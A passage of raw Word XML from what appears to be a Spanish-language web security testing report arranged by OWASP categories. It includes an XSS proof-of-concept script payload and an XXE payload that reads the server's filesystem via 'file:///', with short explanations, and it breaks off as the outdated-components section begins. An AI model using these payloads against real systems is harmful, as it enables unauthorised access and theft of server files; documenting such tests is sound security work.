      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Prueba realizada:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2C9CBD" w14:textId="27776976" w:rsidR="00661EBB" w:rsidRDefault="00661EBB" w:rsidP="00661EBB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ingresé el siguiente script malicioso en un campo de texto vulnerable inspeccionando y tocando el código fuente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD23D49" w14:textId="2E5D09BB" w:rsidR="00661EBB" w:rsidRDefault="00661EBB" w:rsidP="00661EBB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>((“&gt;&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>(12345678900987654000)&lt;/script&gt;))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEF032B" w14:textId="25593056" w:rsidR="00661EBB" w:rsidRDefault="00661EBB" w:rsidP="00661EBB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69A0110E" w14:textId="27FC24F2" w:rsidR="00661EBB" w:rsidRDefault="00661EBB" w:rsidP="00661EBB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Este script fue procesado y ejecutado por el navegador al cargar la página, generando una alerta que confirma la existencia de la vulnerabilidad al inyectar código.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F22240B" w14:textId="7F327627" w:rsidR="00661EBB" w:rsidRDefault="00661EBB" w:rsidP="00661EBB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D37A1CE" wp14:editId="28E9A93E">
            <wp:extent cx="5612130" cy="311340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3113405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB87143" w14:textId="2C2F0989" w:rsidR="00A57A77" w:rsidRDefault="00A57A77" w:rsidP="00661EBB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="238D9BD2" w14:textId="77777777" w:rsidR="00A55541" w:rsidRDefault="00A55541" w:rsidP="00661EBB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1390EB55" w14:textId="39A0CFA8" w:rsidR="00A57A77" w:rsidRDefault="00A57A77" w:rsidP="00661EBB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="694B2736" w14:textId="77777777" w:rsidR="00A57A77" w:rsidRDefault="00A57A77" w:rsidP="00661EBB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44890E7A" w14:textId="4F4E377A" w:rsidR="00E551EE" w:rsidRDefault="00E551EE" w:rsidP="00661EBB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06B317D8" w14:textId="5AE9350A" w:rsidR="001C2992" w:rsidRPr="00A57A77" w:rsidRDefault="00C22B5E" w:rsidP="001C2992">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">A5 </w:t>
      </w:r>
      <w:r w:rsidR="001C2992" w:rsidRPr="00A57A77">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Security Misconfiguration</w:t>
      </w:r>
      <w:r w:rsidR="00604B70" w:rsidRPr="00A57A77">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Configuración de Seguridad Incorrecta)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132F33E0" w14:textId="3D281232" w:rsidR="00604B70" w:rsidRDefault="00E562D3" w:rsidP="00604B70">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">La configuración incorrecta </w:t>
      </w:r>
      <w:r w:rsidR="009B6A63">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>de seguridad ocurre cuando el sistema, servidor o aplicación no esta configurada adecuadamente para protegerse contra acceso no autorizado o explotación de recursos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454ED890" w14:textId="077B461E" w:rsidR="009B6A63" w:rsidRDefault="009B6A63" w:rsidP="00604B70">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">El impacto de esta vulnerabilidad incluye la exposición de datos sensibles, escalar en los privilegios y la apertura de puertas para otros posibles ataques, como la inyección de comandos o el robo de información. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3DA1F3" w14:textId="1A7AB1D5" w:rsidR="009B6A63" w:rsidRDefault="009B6A63" w:rsidP="00604B70">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="700507F3" w14:textId="677A9CDC" w:rsidR="009B6A63" w:rsidRDefault="009B6A63" w:rsidP="00604B70">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Prueba realizada:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E095F6" w14:textId="7A311D19" w:rsidR="009B6A63" w:rsidRDefault="0090075F" w:rsidP="009B6A63">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Accedí </w:t>
      </w:r>
      <w:r w:rsidR="00A044B5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>a áreas de configuración que no requieren autenticación adecuada</w:t>
      </w:r>
      <w:r w:rsidR="00A55541">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> o donde se utilizan credenciales predeterminadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E41C218" w14:textId="0DA02C5D" w:rsidR="00A55541" w:rsidRDefault="00A55541" w:rsidP="00A55541">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Verifique los recursos expuestos como directorios no protegidos o archivos de configuración accesibles públicamente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D2A7A7" w14:textId="77777777" w:rsidR="00A55541" w:rsidRDefault="00A55541" w:rsidP="00A55541">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F0FE6E6" w14:textId="77777777" w:rsidR="00A55541" w:rsidRDefault="00A55541" w:rsidP="00A55541">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Utilice este código: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4019B6C8" w14:textId="77777777" w:rsidR="00A55541" w:rsidRPr="00A55541" w:rsidRDefault="00A55541" w:rsidP="00A55541">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56A70683" w14:textId="566FEE25" w:rsidR="00A55541" w:rsidRPr="00A55541" w:rsidRDefault="00A55541" w:rsidP="00A55541">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A55541">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A55541">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A55541">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A55541">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A55541">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>="1.0"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B1B378" w14:textId="77777777" w:rsidR="00A55541" w:rsidRPr="00A55541" w:rsidRDefault="00A55541" w:rsidP="00A55541">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A55541">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A55541">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>comment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A55541">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> [&lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A55541">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A55541">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM "file:///"&gt;]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3EE14E" w14:textId="77777777" w:rsidR="00A55541" w:rsidRPr="00A55541" w:rsidRDefault="00A55541" w:rsidP="00A55541">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A55541">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A55541">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>comment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A55541">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>&gt;  &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A55541">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A55541">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A55541">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A55541">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A55541">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A55541">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697459BC" w14:textId="4DC9D95A" w:rsidR="00A55541" w:rsidRDefault="00A55541" w:rsidP="00A55541">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A55541">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A55541">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>comment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A55541">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048B9824" w14:textId="6DFEA6B6" w:rsidR="00E551EE" w:rsidRDefault="00A55541" w:rsidP="00661EBB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B12CEFB" wp14:editId="34083A48">
            <wp:extent cx="5612130" cy="3971925"/>
            <wp:effectExtent l="0" t="0" r="762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971925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4E77EC" w14:textId="36639F41" w:rsidR="007930F0" w:rsidRDefault="00C22B5E" w:rsidP="007930F0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">A6 </w:t>
      </w:r>
      <w:r w:rsidR="007930F0" w:rsidRPr="007930F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Vuln &amp; outdated Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352D3079" w14:textId="6BD16A61" w:rsidR="00D04A28" w:rsidRDefault="007E2074" w:rsidP="00D04A28">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E2074">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Esta vulnerabilidad se produce cuando una aplicación utiliza bibliotecas, frameworks, o componentes que contienen fallos de seguridad conocidos debido a versiones desactualizadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC2EFA2" w14:textId="77777777" w:rsidR="007E2074" w:rsidRPr="007E2074" w:rsidRDefault="007E2074" w:rsidP="007E2074">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E2074">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
